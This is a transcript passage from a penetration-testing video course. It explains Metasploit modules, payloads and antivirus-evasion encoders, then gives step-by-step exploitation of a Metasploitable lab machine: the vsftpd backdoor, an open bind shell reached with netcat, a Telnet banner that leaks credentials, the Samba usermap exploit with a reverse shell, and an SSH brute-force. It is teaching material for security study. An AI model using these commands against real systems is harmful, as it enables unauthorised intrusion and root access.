could be files, saved passwords, dumping hashes, enumerating other services and applications on the target, and many other things we can do with post-exploitation modules. After you type ls, you will see that they are mostly split the same as the exploits. If we go to Windows post-exploitation modules and type ls right here, we will see different post-exploitation submodules that have different purposes, such as gathering information, such as escalating privileges. And this escalating privileges simply means if we exploit the target as a regular user on that machine, we would always want to try to escalate our privilege to become an administrator or a root account. We can also see VLAN post-exploitation modules, and I believe this would be used to steal saved wireless passwords to the access points that the target was connected to. Okay? You can explore the others as well if you want to. And let's talk about the others as well, so we can go through all of them real fast, so you can get a pretty good understanding of what all of these modules do. And the next one that we will talk about is also really important, and that is payloads. If I change directory to payloads, clear the screen, and type ls, and hopefully you remember that payload is something we deliver to the target with an exploit in order to control that machine. And in this payloads directory, we can see it is split in 3 different subdirectories: singles, stagers, and stages. What does this even mean? Well, singles are payloads that are completely standalone. A single payload can be something as simple as adding a user to the target system or running some other application. Stagers set up a network connection between the attacker and victim and are designed to be small and reliable. And lastly, stages are payload components that are downloaded by stagers modules. These payload stages can provide us with advanced features with no size limits, such as, for example, different command shells or meterpreter shells. And meterpreter is something that we mentioned for the first time. Meterpreter shell is also something that we will use a lot. It is similar to the command shell, but with a bunch of other options as well besides executing commands. We can download files, upload files, record microphone conversation, run webcams on target machine, take screenshots of their desktop, and many other things we can do with the meterpreter. So once we are exploiting a target, meterpreter is usually what we want to run on that target after an exploit. If I go to stagers directory right here, so cd stagers, clear the screen, type ls, and if I, for example, go to Windows stagers, type ls, here we can see different ways of establishing connection. Remember when we talked about 2 different types of shells in the last video? Well, here they are. Here we can establish a connection either by binding to a port or by listening and creating a reverse shell connection. They are further divided into, for example, reverse HTTP, reverse UDP, and reverse TCP. And out of all of these that we have right here, we will almost always use reverse TCP. So for now we know that 2 main things we will combine in a payload is reverse TCP connection and a meterpreter shell, because that 2 combined give us much more options to do with the target. Okay, great. Now, if you don't understand some of this, don't worry once again. This is something that you will fully understand once we get into the practical examples. For now, we're left to explain 3 more modules, and we're going to go quickly through them, since they are less important than the ones that we already covered. And those are the evasion modules, encoders, and NOPs. Now, let's go with encoders first. Encoders are something that helps us to evade antivirus detection. How exactly? Well, even though we call our payload a shell or a meterpreter, what it is to antiviruses and other people, it is just a simple malware or Trojan or a virus. That's why, with the help of encoders, we can encode our payload and make it less detectable by some antivirus vendors. These are not that useful anymore since they are known to almost all antiviruses. They can, however, help us bypass some of them. And evasion modules do pretty much the same thing. And if I change directory to them, so cd evasion, you will see that there are evasion modules only for Windows. And they are used to bypass Windows Defender. If I change my directory right here, type ls, we will see different Windows Defender files that we use in order to bypass the Windows Defender. However, since Windows Defender recently got an update, I believe many of these don't work anymore. But don't worry, we will see later in the course different techniques that we can use to bypass antiviruses and execute our payload. And the last thing that we got are NOPs. NOPs can be a little bit hard to understand. What a NOP is an instruction for the processor to do nothing. Once a processor reads a NOP instruction, it does absolutely nothing. And I know what you're thinking, what is the purpose of this for us? Well, these NOPs are useful in buffer overflows to allocate a lot of space in memory before the payload executes. By the way, NOP stands for no operations, and if you ever programmed in assembly before, you will be familiar with this. But don't worry, for now, NOPs are not that important for us. Okay, that was a lot to take for one single video, but all of this will be more clear once we start exploiting our target, and trust me, we're really close to that. We just need to explain the usage of Metasploit in the next video real quick, and after it, we will perform our first exploits. So get ready, and I will see you in the next video. Welcome back. In the previous video, we talked about Metasploit framework structure. We explained all of the modules and what they are for, but we haven't really ran the framework itself. In this video, we're going to run it and cover some of the basic commands for it. Okay, I already mentioned in the last video that to open this framework, what we must do is open our terminal and type msf console. Press enter. And keep in mind that it might take some time to open, especially if you're running it for the first time. And here it is, it already opened for me, and what we get right here is we get the banner of Metasploit framework, which changes every time you start this program, and down here we get these 7 modules that we talked about. And we also get the exact number of modules that we have available to us. So here we can see 2043 exploits, 1105 auxiliary modules, 344 post-exploitation modules, over 500 payloads, and a little bit of encoders, NOPs, and evasion modules. As in every other tool that we covered, to see all the available commands we can use, we can run the help command. This will open the help menu, which will give us all the available options, as well as some of the examples of how we can use Metasploit. But for now, this is not necessary, as I will show you a few of these commands that you will use every time. And by the way, before we get into those commands, what you can do inside of the Metasploit framework, you can also run the normal commands, such as ls, such as changing directories, such as, for example, running ifconfig. So if I type sudo ifconfig and type in my password, it will give me the output of ifconfig. So you can also run regular terminal commands from this. But as far as the Metasploit framework goes, let's start with listing some of the modules. For example, we can use the show command to list out any type of modules we want. So we know that there are over 500 payloads. We saw the number once we started the Metasploit. In order to list all of those 500 payloads, we can type show and then payloads. If I press enter, it will take just a few seconds and it will list out all of the available payloads that we have. Now right here, this is not really that good of an output because I have my terminal a little bit more zoomed in than I should have, so I will just go to the preferences and lower the font of my letters. So I'll click on OK, apply, OK, clear the screen, and I will type show payloads once again. It's still not that good. Let me just go and lower it a little bit more. So I will just go to 13, apply, and click on OK. Clear the screen, run the command again, and here it is. We get a better output. So let's explain what we see right here. If I scroll all the way up to the beginning, we can see this is the number of the payload. It goes from 0 to over 500, and this right here is the name of the payload. So as we already know, there are bind shells and reverse shells. So we get different types of them. We can see the payloads for Android, the payloads for Apple iOS. We can see all types of payloads, command shells. We can see Java payloads, Linux payloads, if I go all the way down, OS X payloads, PHP payloads, Python, Ruby, and a bunch of others as well. Here's also Windows payloads. So we get a lot of them. Under the rank, they're all manual because they have to get executed on the target machine. And in the description, we can see for what this payload is. For example, if we check out this one, Apple Meterpreter Reverse HTTP, this is the Apple iOS Meterpreter shell or Reverse HTTP inline. So this means you would use this payload if you were, for example, attacking an Apple device. Now, we can do the same thing with exploits. If we want to list all of the 2000 exploits, we can type show exploits. And this might take a little bit longer because there is a lot more exploits than there is payloads. And here they are. Here are all 2041 exploits. You can see the output is pretty much the same as with the payloads. We get the number right here, we get the exploit name, and these exploit names are really well written. As we can see, the first part tells us for what is this exploit. Currently we are inside the Windows exploits. And if we scroll all the way up, we should see some other exploits as well. Let's go and scroll all the way up. Well, it seems that we can only go up to here because there is a lot of them. But nonetheless, we can see for what the exploits are. For example, this one is for Windows and for browser. And here it specifies exactly what does it exploit. If I go down here and, for example, check out these ones, here we can see this is also Windows exploit for the FTP. So they're very well organized, and this is the structure that we saw in the previous video. Just this is how the Metasploit framework outputs it for us. These exploits that belong to Windows FTP are all located inside of the FTP directory of the Windows exploits directory. If I go all the way down, and what we can do right here is we can choose one of these exploits just to see how we can select them and run them. Of course, we are not going to be attacking any target. We just want to see how we can select one of these exploits. So let's go with this one. For example, Windows SMB MS06 040 Net API. And by the way, to check out more information about exploits, we can go on to the right. So this exploit came out in 2006. And in the right column, right here, it tells us what exactly does this exploit do. So for this particular one, we get that it is an exploit for Microsoft Server Service, and it overflows this function. Now, the good part about this is that you don't really need to know how these work in order to be able to run them. Let me show you. If you copy this exploit name right here, so copy Windows SMB MS06 040 Net API, in order to select it, let us clear the screen, we can type the command use. And you type use and then the module name that you want to use. In our case, we want to use an exploit. And after it, all we have to do is paste the exploit name. So use exploit /windows /smb / and then the name of the exploit. Press enter. And we will see that this exploit configured payload Windows Meterpreter Reverse TCP. And we will talk about this in just a second. For now, we can see that it is currently using the module that we selected, because it is printed out in red right here, and it also tells us that it is an exploit. So let's check out all the information that we can get for this exploit. The first thing that I always like to do is type the command show info. And this show info command tells us more about this particular exploit. So if we go down here to the description, it will tell us this module exploits a stack buffer overflow. So this is a buffer overflow exploit. In the net API 32 canonicalize path name function using this RPC. And you can read about any exploit that you select. Another information that we get right here are some of the references. So you can visit these links right here to read more about this particular exploit. Besides this, another command that we can do is show options. And this is the important part. Let me just clear the screen and type it once again just so we can see only the options part. Here is where you select your options for the exploit. First thing we see is module options, and it asks us for 3 different things. And keep in mind, different exploits will want different things. Usually they will all have these rhosts and rport, which is just the remote host and the remote port, or in our case, the target's IP address and the target's port that we're attacking. So we can see 2 of these are already automatically set. The rport is already set to be 445 and the SMB pipe is already set to be the browser. All we are left to specify right here is the rhosts, or the IP address of the target machine. So if we were attacking a Windows server that was vulnerable to this attack, we would specify here the IP address of that Windows server machine. And in this column right here, you will notice that some of these things will be required and some of these things will not be required. In our case, in this particular exploit, all of these 3 things are required to specify in order for exploit to work. In the description, it tells us exactly what it wants from us. So the rhosts is the target host or the target's IP address. The rport is the SMB service port on the target machine. And the SMB pipe is the pipe name to use. So these are the exploit options. And down here we get payload options. Now what does this mean? Well, remember, after exploiting the target, we drop a payload. So by default, remember once we ran the command to use this exploit, it gave us Windows Meterpreter reverse TCP by default. This means that we're using a payload for Windows. It is a Meterpreter shell, which remembers it is the best shell that we can get. And it is a reverse shell over TCP connection. You can change this if you want to, and down here we get the options that we need to set for payload. Remember, once using reverse shell, we must listen on our Kali Linux machine for the incoming connection. And that's the information that it asks us right here. The lhost is our own IP address, the IP address of Kali Linux machine. Or as it says right here, the listening address. We specify our IP address right here, so you just need to type sudo ifconfig. And we can see 192.168.1.9. Usually the Metasploit framework will set it by default. So let me just clear the screen, run show options once again. And the L port is the listening port, or the Kali Linux port that we want to listen for the incoming connections. And it is usually set by default to be 4444. And all of these options you can change. For example, if you notice that Metasploit framework set the incorrect IP address for a Kali Linux machine, you can type set and then the parameter name, in our case lhost, to be a different IP address. For example, 192.168.1.15. And it will set the lhost parameter to be a different IP address, as we can see right here. Inside of these rhosts, as we can see this is also required, we would set the IP address of our target machine. So let's say we had a Windows server and its IP address was 192.168.1.20. We would type it right here, so 192.168.1.20. And if I type show options once again, now we got this set as well. Now, payload is something that you can change. Usually you want to leave it what Metasploit framework already gave you, because the default one is usually the best one. But sometimes some of the payloads will not work and others will work. So in order to see all of the available payloads, that you can use for this particular exploit, you can type show payloads once again. Just this time it will not list out all the 500 possible payloads, it will only list out the possible payloads for this particular exploit. And this will be all the Windows payloads. Since we are attacking a Windows machine with this exploit, the Windows payloads will be something that we can use. So we can see some bind shells, reverse shells, we can see some of the meterpreter shells. So for example, let us say that you don't want to use a reverse shell, you want to use a bind shell. How would you change the payload? Well, you would copy the bind shell. Let's say we want to use the meterpreter bind shell, so copy its name. And go all the way down and type set payload and then paste the payload name. So paste selection, press enter, and it will tell us the payload has been changed. If I clear the screen, show options, we will see different payload. We no longer have the meterpreter reverse TCP, we now have the bind TCP meterpreter. And it will also ask us for different information about the payload. We no longer get the lhost, since remember with bind TCP it is not our Cal Linux machine that is listening for the connection, it is the target machine that is listening for the connection and we are the ones that connect to it. So in this case it is asking us for our host, or the remote host, or as the description says, the target IP address. So we would select right here the same IP address that we select right here, because it is the target that has to open the port, and the local port will be the local port on the target machine that will open for us to connect to. And you would select here whatever you want. So what is important to get out all of this is that we can change different options using set command. So you just type set, and then for example we want to change the L port, we type L port and then make it whatever we want. And if we type show options, it will be changed right here. And the last part that we see down here are the targets. And these targets right here are all of the vulnerable targets for this particular exploit. To list all of them out, we can type show and then targets. This will give us a list of all the targets that we can exploit using this attack. So we get Windows NT, Windows XP, and now different versions of Windows XP and Windows 2003. So this is an older exploit that attacks Windows XP machines. Now you can either, if you know exactly which version of Windows is the target running, you can select it right here by specifying set target and then the number. For example, let's say the target is using Windows XP SP1 English. You could type it like this, so set target 3, because the ID for that particular version is 3. Or if you didn't know exactly which version, you would just leave it on automatic, which means that Metasploit framework will figure it out on its own, so we don't need to specify it. The only important thing is that it is one of these versions. If it is, for example, a Windows 7 machine, this exploit will not work. And once you set all of these options, the last thing you need to do is type exploit. In our case, this will not work because we don't really have a vulnerable Windows XP machine, so it will give us an exploit failed error. In this case it is unreachable because this IP address right here on my local network is not even online. That's why this will not work. And this is pretty much it. Now there are other commands as well that could be useful, but these are the main ones that we always use to choose exploits and payloads and to set their options. Finally, the time has come. In the next video, we're going to apply what we learned for now to perform our first exploit on the Metasploitable machine. See you in the next video. Hello and welcome back. Are you ready to hack your first target? Everything we learned up to here was building up to this moment. We're going to use all of our previous knowledge that we got to hack our target. Of course, this is just one of the many exploits that we will cover in this course, but it is important because it is our first one. In this case, we're of course going to be attacking the Metasploitable for our first exploit, so make sure you start it up, check out the IP address of Metasploitable. In my case it is 192.168.1.5. And what I'm going to do is I'm going to open two terminals. In the first one, I will start my MSF console, and in the second one I will perform the nmap scan for the version of the service. So we already know the command sudo nmap-sv and then the IP address of my Metasploitable. It will ask me for the password, I will input it right here and it will start the scan. And you can open your Metasploit framework once the scan is running, and once you open it, just wait for the scan to finish. Okay, so here it is. This is an output that we're already familiar with. Let's see whether we can exploit the target, and we're going to start in order. Let's go with the FTP port first. So we notice right here which version of service is it running. In this case, VS-FTPD 2.3.4. And also keep in mind that there is really no plan once you do something like this. We only know that the goal for us is to find an exploit if this software is vulnerable. Now, even though we know that best search would be us going on internet and typing VS-FTP vulnerability, but I myself like to run the search exploit tool first, just to see whether we already have it right here on the machine. So I will open another terminal and I will copy the name of the version, in this case VS-FTPD 2.3.4, copy it and type search exploit and then paste the version name. If I press enter right here, we get one result. We get VS-FTPD backdoor command execution. And in the right column, as you remember, we get the path to this exploit. There is one thing that we should notice right here. This is .rb. What does this mean? Well, this most likely means that this exploit belongs to Metasploit framework. And it also tells us that right here in the brackets. So it means that we will have it right here, under one of these 2000 exploits. So how we can find it? Of course, we are not going to be listing all the 2000 exploits and trying to find the correct one. What we can do is we can type search and then the software name, so VS-FTPD. And here it is. Exploit, Unix, for the FTP, and it is the VS-FTPD 2.3.4 version backdoor. It came out in 2011. It is ranked excellent, which means this exploit works, and here is the description for it. Let's read more about it, but first we need to select it. So to do that, we can type use exploit Unix FTP and then the name of the exploit. Press enter, and we can see the payload is default configured to CMD Unix Interact. But we're going to check this out in just a second. Let us first clear the screen and type the command show info. We want to read more about this exploit. So it will tell us in the description, this module exploits a malicious backdoor that was added to the VS-FTPD download archive. This backdoor was introduced in the zip file archive between June 30th, 2011 and July 1st, 2011, according to the most recent information available. This backdoor was removed on July 3rd, 2011. Interesting. Let's see whether we got the vulnerable version. So if I clear the screen and type the next command, which is show options, we will see right here what are the things that we need to set up in order for this to work. So in this case, we only got two things. We got the R hosts and we got the R port. And this is the remote host, which is the IP address of our target. And the R port is the port number where the FTP is running on the target machine. If we go to my scan, we will see the port is set correctly, which is port 21. So this is something that we will not change. However, we need to set our remote host IP address. So let's set the IP address of Metasploitable, set our hosts 192.168.1.5 in my case. The payload is set by default, and if I type show payloads to see all of the available payloads that we have, for this particular attack, we only get this single payload. So there is nothing really to change right here. We're going to use that one. And we can see it doesn't require any additional options whatsoever. So the easier for us, the better. Under the description, we can see it is a Unix command. We simply just interact with established connection. So I expect that with this, we're going to be able to execute commands on target machine if we manage to exploit it. Under the targets, we can type show targets to see the available ones, and we got none because this is an actual exploit for the software. So in order to be able to exploit the target has to be running this software version, which in our case it is running. So everything is set. Let us double check, type show options. We got the IP address of the target, we got the port number where the software is running on the target machine, and all we need to type to execute this is type exploit. Press enter. And here it is. We got the command shell session 1 opened on the target system. How do I know this? Well, it doesn't give us any output right here, but if I type, for example, ls, you will see we are getting an output. And this ls didn't execute on our Kali Linux machine. It executed on the Metasploitable. We are on that machine right now. We successfully exploited it. We can run any commands that we want, so if I type who am I, it will tell us that we are the root account. So not only did we manage to hack that machine, we also are root privileged account, so we can do anything we want on it. If I type pwd to check my current directory, I am in the / directory. And if I type ifconfig, just to prove to you that we're on the target machine, we can see the output is 192.168.1.5. So that is the IP address of Metasploitable, as you can see right here. Inside of the / directory that we're currently at, we can create files right now. Let's go to the Metasploitable just to show you, and if I type ls in the / directory, these are the current files inside of this directory. If I type now mkdir and then test, and I type ls once again, now you will see that we successfully created the test directory on the Metasploitable machine. And if we check it on the machine itself, here it is. Here is the test directory that we just created. So we successfully hacked the target. Now the reason we are getting an output like this is because this is not really that good of a shell. This is not a Meterpreter shell so that we get a well-organized output. But nonetheless, it is a shell indeed. We can execute the commands and we get the output of those commands back. And not only that, but we are a root account on the target system. Now, to exit the shell, we can just type exit. And it will tell us right here, command shell session 1 closed. And it was that easy. We gained root privilege account on the Metasploitable machine, and we could have done anything on it. This is as good as it can get. And this is exactly what we are looking for once we try to exploit the target. Now, sometimes it is this easy, but sometimes it isn't. And we will see some complicated exploits later on, and it will be even more complicated to exploit a target if it doesn't have any vulnerability. But for now, we are happy. We managed to hack our first target. But this is just one of the vulnerabilities. Let's keep exploring and see in the next few videos if the Metasploitable has some other vulnerabilities as well. And then after we finish with Metasploitable, we're going to move on to some other harder targets. Welcome back. In this video, we're going to cover and talk about misconfigurations. And also, in this very video, we will cover the easiest possible vulnerability that you could ever find. You might have already noticed it while we scan Metasploitable, and if you didn't, I will give you a chance to find it right now. So what I did right here is I performed a version scan on the Metasploitable virtual machine. You can do the same, or you can just take a look at the results right here. And do you by any chance see something that sticks out right here? Something that shouldn't be here. Now, you should be able to figure it out based on what we learned for now. So I will just give you a few seconds. And time has come. Have you managed to find it? It is this bind shell right here. And under the version it says Metasploitable root shell. I mean, just by its name we can see that something doesn't seem right. We know what bind shell is, right? So if this service doesn't have any type of authentication, we can just try to connect to this port that hosts this bind shell, in case port 1524 over TCP, and we will be given a root shell on that machine. Can't be that easy, right? Well, it is, And I wouldn't even consider this an exploit. This is just an example of what a misconfiguration could look like. Now, this would be a critical misconfiguration that would almost never happen. But sometimes even stuff like this can happen. Maybe an administrator set up something like this so he can access that machine from his home or from somewhere else, but he forgot to put authentication on it. You never know. Okay, so how can we establish connection to this port? Well, we won't be using Metasploit framework for this particular thing. Instead, we're going to use a tool called Netcat. And Netcat is a program that allows us to establish network connections with other machines using both TCP and UDP. To run the Netcat help menu, we can type nc-h, which stands for help. And here we can see menu isn't that big at all. It only has a few options right here. And at the beginning of the menu, we also got these two main options. We can either connect to somewhere, or we can listen for the inbound or incoming connections. Since our Metasploitable target machine has a bind shell, that means we must connect to somewhere. And the syntax is just nc, then the hostname or the IP address, and then the port. Let's try it out. If I go down here and type nc, and then the IP address on my Metasploitable, I go and check out over which port is the bind shell being hosted. It is over port 1524. And I will type space and then the port. Or let me just clear the screen first and type nc 192.168.1.5 and then space 1524. Press enter. And it worked. We are again a root account on the Metasploitable machine. And as in the previous video, we can do anything we want. So if I type who am I, we can see we are the root account. ls tells us what directories we have. And remember the test directory from the previous video? Here it is. ivconfig will give us the IP address of the Metasploitable machine. So everything works as in the previous video. We are root account and we can execute the commands on the target system. Now, don't get used to this type of exploitation. Matter of fact, I won't even consider this an exploitation because the vulnerability wasn't in software, but in a person who would set something like this up without ever authenticating. Stuff like this rarely happens, but I wanted to show you this just to see whether you will notice it in our scan. In the next video, we're going to check out another quick vulnerability that is based on information disclosure. After that, we're getting slowly into harder and harder exploits. See you in the next video. Welcome to another attack that we will perform on our Metasploitable machine. And this one is aimed on Telnet. Keep in mind that this vulnerability is only possible due to information disclosure. And you will see by the end of this video why. So I got my scan right here and we can see that the Telnet is running on port 23. If we check out the version, it says Linux Telnet D. That doesn't seem to give us that much of information about the actual version. If we just copy this version right here, open another terminal, we could just do the same thing that we did with the FTP version. So we could type searchsploit and then paste the version name. And it seems that we got two different results. And from looking at them, they don't seem to be useful for us. The first one says Netkit Telnet 0.17 and it says in brackets that it's for Fedora 31. And the second one doesn't seem to be something we're looking for either. We can't get the exact version of Telnet, so what are we going to do? Well, we know that Telnet requires username and password in order to log in. So let's maybe try the default credentials. To try them and to connect to the Telnet port on some machine, we can type in our terminal, let's first clear the screen, Telnet, and then the IP address of the machine that we want to connect to. In my case, 192.168.1.5. And I press here enter. Do you see it? Not only do we get the banner for the telnet, but we also get some additional information that shouldn't be here. We get this statement that says login with msfadmin/msfadmin. And if you remember this banner, and these things are exactly the same as the banner that we get once we log in to the Metasploitable, as you can see right here. These two are exactly the same. They just hosted the same banner on the Telnet open port as well. So if they already gave us username and password, let's use it. Let's see whether it will work on Telnet. If I type msfadmin and msfadmin as the password, here we are. Once again, we are on the Metasploitable machine. Just this time, you will notice that we are not root account. So if I type who am I, we are the msfadmin, we are not the root account. And this is something that we can easily bypass. If I type the command sudo su, it will ask me for the password for the msfadmin, and we already know it from the banner. It is also msfadmin. I type it in, press enter, and now we are root account, as we can see right here. And also if I type who am I, it will tell me we are root account. Now, I know what you're thinking. This is too easy. Something like this will never happen in real life. And you're correct. These types of vulnerabilities will rarely happen. However, we're slowly processing to higher and higher vulnerabilities. The last two were just misconfigurations and information disclosure, while the first FTP vulnerability had a vulnerable software running. After we finish showing a few more vulnerabilities for the Metasploitable machine, we're going to go on to the Windows machines. And you will see that we will manage to exploit them without them having any additional softwares like Metasploitable does. So things are soon about to get even more interesting. See you in the next video. Welcome back. Let's continue with exploiting our Metasploitable machine. So we already found 3 vulnerabilities regarding Telnet, FTP, and the bind shell with no authentication. Let us see what else can we find. And what I got in mind for now is this Samba open port right here. Matter of fact, these two open ports, 139 and 445. Why them? Well, because it seems that we do not have the exact version of Samba right here. It tells us that Samba is between 3 point something to 4 point something. So let's see how we will figure out what exploit to use and how to find it. Here's a small hint. We don't need to Google it to be able to find it. We have everything we need right here in Kali Linux. So don't use Google to find it, since it is cheating and you will most likely find it on the first link. Let's see whether we can figure it out by ourselves. So right here in our scan, we have this Samba version right here. Not the exact version, but it does give us some information about in between which range does the version belong to. And that is something. We also see that ports hosting this are 139 and 445. So we do got some information. What now? Well, let's just search Samba inside of Searchsploit and see what comes up. So I got this scan right here. I got my MSF console right here. And I will open a third terminal and type Searchsploit Samba. Well, it seems that we get a lot of results. And these are exploits for a bunch of different Samba versions, as we can see right here. Now, we could just try all of them out to see whether they will work, or we can try to figure out the Samba version first, and then narrow down our exploit search and see whether we find something for that specific version. So, how are we going to find out the Samba version? Our Nmap scan didn't manage to do it. Well, luckily, Nmap is not the only scanner that we can use for these types of things. Remember that in Metasploit framework, besides having all of these exploits and payloads, we also get those auxiliary modules. And those auxiliary modules can sometimes be scanners. Let's search and see whether we can find a scanner for this. if we just type in the Metasploit, search Samba, and press enter, we get some of the results right here. Matter of fact, we will get a lot of the results once again. Some are exploits, some are auxiliary modules, and down here I believe there is one post-exploitation module. And if we go to the auxiliary modules, it will only give us 2 auxiliary scanner modules. These aren't the scanners that we need. Let's try to find it ourselves. If I go down here, clear the screen, and type use auxiliary, and then we search for a scanner, and then SMB, because that is the port that we're enumerating, and then tap twice. These are all of the available auxiliary scanners that we have for SMB. The one that we are particularly interested in is this SMB version. So let's copy it. If I copy the entire command right here, paste it, press enter. Oops, let me just delete this. We type the command twice. So use auxiliary scanner, SMB, and then SMB version. And if I type show info right here, it will tell me in the description display version information about each system. This looks like something that we need. Let's type all of the needed information for this to run. So we're going to type show options first, and we require our hosts. We got some other things as well, but these 3 things are not required, as it says right here. The threads we will leave on 1, and the R hosts will be the IP address of our Metasploitable. In my case, 192.168.1.9. I will set this right here, and if we run it, well, it worked. Even though it says right here host could not be identified, in the brackets we get the exact Samba version on the Metasploitable, which is 3.0.20. Cool. Let's see what we can find from exploits now that we know what version it runs. So I will copy this 3.0.20 and go back to my searchsploit, clear the screen, and type it once again. Just this time I will paste the entire version. Press enter, and we managed to narrow it down to only 5 results. And it seems that these 2 are the same results, so it's actually 4 results in total. The first one seems to be some type of a security bypass, and it affects our version, since it's between 3.0.10 and 3.3.5. But it also seems to be a TXT file, which we really don't want to bother with right now. We want something that we can execute right away. The most interesting thing we have right here is this Samba username map script, or the command execution. Why? Well, it's a Ruby exploit, and it also belongs to Metasploit framework. Plus, it also affects our version of Samba, as we can see right here. These 2 down here are also TXT files, not really interested in, and they also don't seem to actually affect our version. They only affect the versions below our version. And the last one, which is denial of service or DOS attack, seems to be affecting our version, but we're once again not interested in the denial of service attacks. But in a real penetration test, you would 100% write this on a report with the references to the possible attack. For now, let's just go with the Metasploit module that we found. Let's remember the name, username, map script, command execution. And if I search once again, in my Metasploit, search Samba, let us try to find the exploit that we found using searchsploit. If I go up here, go through all of these results, and here it is. Under the 13, exploit multi-Samba, user map, script command execution. This is the same script that we saw right here. Here it is. If I copy the script name, so exploit multi-Samba, user map script, and type right here use, then paste the script name, it will set the default payload to be command Unix reverse netcat. And by the way, this multi right here means that it can be targeted on multiple operating systems. While as if you had only Windows or Linux specified right here, it would mean that only that specific operating system is vulnerable to this attack. So let's show information about this exploit. I will first clear the screen and type show info, and it will tell us this module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25 when using the non-default username map script configuration operation. And if I also set up all of the things that we need, so show options, seems that we need one thing, which is the R host, so let's set it up right away. This is the IP address of Metasploitable. The port right here we do not want to change, since it is already set correctly, as we can see right here, port 139 is running Samba. And down here is our payload, which is the reverse netcat. We set the IP address of our Kali Linux machine here and any port that we want. Once all of this is ready, we can run our exploit. And here it is. We once again got command shell opened on target system using Samba vulnerability. And we can, as usual, execute commands. If I type who am I, it will tell me we are root. So we're already highest privilege on that machine. Great. This is the fourth vulnerability we found. To close the connection, we can just Ctrl-C this and click on Y. And you would write this down as another successful exploit if this was a real penetration test. In the next video, we're going to cover a different type of the attack that we haven't performed yet, which is brute force attack on port SSH. It is time to switch things up a little bit and check out a new type of the attack called brute force attack. Unlike the previous attacks, which were vulnerabilities, information disclosures, or misconfigurations, right now we're going to perform something that will be more of a presentation of the attack than the attack itself, since we're going to cheat a little bit. But before I tell you how we're going to cheat, let's first explain what are brute force attacks. Well, brute force attacks is you sending a lot of different information to the target in order to figure out what information is correct. Now, you could be wondering, what do I mean by sending information to the target? Well, this can be anything. In 99% of cases, it is usually usernames or passwords, so we send a lot of usernames and a lot of passwords and hope that we by accident hit the correct one. And when is this useful? Well, you usually perform this attack to see whether the target has default credentials or weak passwords. These type of attacks will work, for example, if the target has a password that has a small amount of characters, or if it is very easy to guess. For example, password 123 is very easy to guess, but it is also one of the most used passwords in the world. In this case, we know that the MSF admin and MSF admin is one account on the target machine. So we will use those credentials to log in to the SSH. In that sense, this will not be a real attack, since we will be putting those credentials in two different lists. One list will contain usernames, and other list will contain passwords. Then we will run the brute force attack, and you will see it will automatically go through all of the usernames and passwords in those lists, and it will manage to find the correct ones, which are MSF admin and MSF admin. Let's do it. To perform this using Metasploit framework, we're going to use an auxiliary module that is used for SSH login. If we search SSH right here, we will get a bunch of the results, but the one that we are interested in is all the way up, I believe, and it is this one, auxiliary scanner SSH/SSH login. Let's copy the auxiliary module name. And let's type down here use and paste the module name. If we type show options for this module, we can see we have a lot of options available to specify. Keep in mind that only some of them are required and a lot of them aren't, as we can see by this column right here. Let's see what are the things that we need in order for this brute force attack to work. We got the brute force speed, and this is how fast it will try the passwords. We can specify a single password or a password file, and we will be going with the password file in our case. we must specify the R hosts, which is the IP address of the target. The R port is the SSH port on the target machine, and let's just double check, it is 22 here, and it is also 22 in our scan, so that is already set correctly. Here we can also set the username, and this username field is a single username, or we can set the user file, which will be the file containing a bunch of usernames. Another possible option that we can do is set user pass file. And what this user pass file is a file containing both usernames and passwords. As it says right here, file containing users and passwords separated by space, 1 pair per line. Now for this particular attack, we're going to be using a password file and a user file separately. So what we must do first is we must create those files. Let us open another terminal, navigate to the desktop of our Mr. Hacker account, and let's nano usernames.txt. This will be our list containing usernames. And let's just, for the purposes of this tutorial, write a few of them. So admin root test123. Let's go with the system and MSF admin. We must add the correct one in order for the SSH brute force to be able to find it. And after it, let's add one more. Let's call this one admin123. So this is 6 usernames. Of course, in a real life attack, you would be using much bigger lists. But for now, for the purposes of this tutorial, we will create these small lists and see whether it will work. So we got our usernames file right here, and it has the correct username specified. Let's save it. Now we need to do the same thing with the password, so let's nano passwords.txt. Here let's type password 123, hello world. Let's also type MSF admin, which is the correct password, and we know it at the moment. And at the end, let's type test1234. So here we have 5 passwords, and one of them is the correct one. Let's save this file. And if I type ls, we should have both of the files in our desktop directory. Let's specify them right here in our options. So the password file must be the entire path to this passwords.txt. So we must specify the entire path. To check out the entire path, I can type print working directory inside of the desktop directory and copy this. And inside of our Metasploit framework, we can type set pass_file and then paste the path, add slash, and then passwords.txt. This now set the path to the pass file to be this path right here. And we must do the same thing for the usernames. Let's type set user_file, paste the same path right here, and add, instead of passwords.txt, let's add usernames.txt. Press enter, and if I type show options once again, let's see what else do we need to specify. Here the password file and the user file has already been specified, but we must also specify the R hosts for this to work. So let's do it. If I type set R hosts, type the IP address of my Metasploitable, clear the screen, and I check out options once again. All seems to be set. We will leave the brute force speed to be 5, which is the fastest. And one more thing that we want to change is this verbose right here. This is currently set to false. We want to set it to true. And this verbose means that it will print out even the failed usernames and passwords. It will not only print the successful login. Let me show you right here. If I set verbose to be equal to true, clear the screen and run this, here it is. It started our attack. It is going to try every single combination of usernames and passwords from those 2 files. Now, you might notice this isn't going that fast, and it will print out all of these failed passwords until it reaches the combination of MSF admin and MSF admin as both username and password. Let's wait for that combination to come. And here it is. we found the correct SSH username and password. Once it prints out this success rate here, this means it found the correct username and password. And you can just Control-C this if it didn't stop in order to stop the brute forcing. Now, I know what you're thinking once again. This is not a true attack, since we added username and password to the list. But once again, remember that you would do this for the weak credentials and default passwords. And of course, in real attacks, you would be using much bigger lists than these that we created right here. And many of those bigger lists we can find inside of our Kali Linux machine. However, more about them later. For now, we just tested it out to make sure that this brute force attack works. We can also see right here, it opened the command shell as soon as it found the correct username and password. But if you press Ctrl-C or you waited for this to finish, it doesn't seem that we can execute commands anywhere. We just went back to our auxiliary module right here. We are not inside of a shell. Well, once something like this happens, Metasploit saves the shell in the background so we can still enter that shell. To check out all of the available shells that we currently have established, we can type the command sessions. And here we can see we got one shell over SSH to the IP address of the Metasploitable. To enter inside of this session, we can type the command sessions -i and then the session ID. In my case, it is 1, and it will probably be in your case as well. So if I set here sessions I1, this will start interaction with this shell and it will open our shell right here. And you can now execute the commands as usual. Who am I will tell me that I'm MSF admin. If I want to become the root account, I type sudo su, type in MSF admin password, and I type who am I once again. Now I'm root account. Another way that you can establish SSH connection once knowing the username and password is like this. First, let's exit out of this, exit out of Metasploit framework, and now that we know the username and password of the SSH, we can open our terminal and type SSH MSF admin, which is the username, @ and then the IP address of the Metasploitable, which is 192.168.1.9 in my case. If I press here enter, it will ask me this question, are you sure 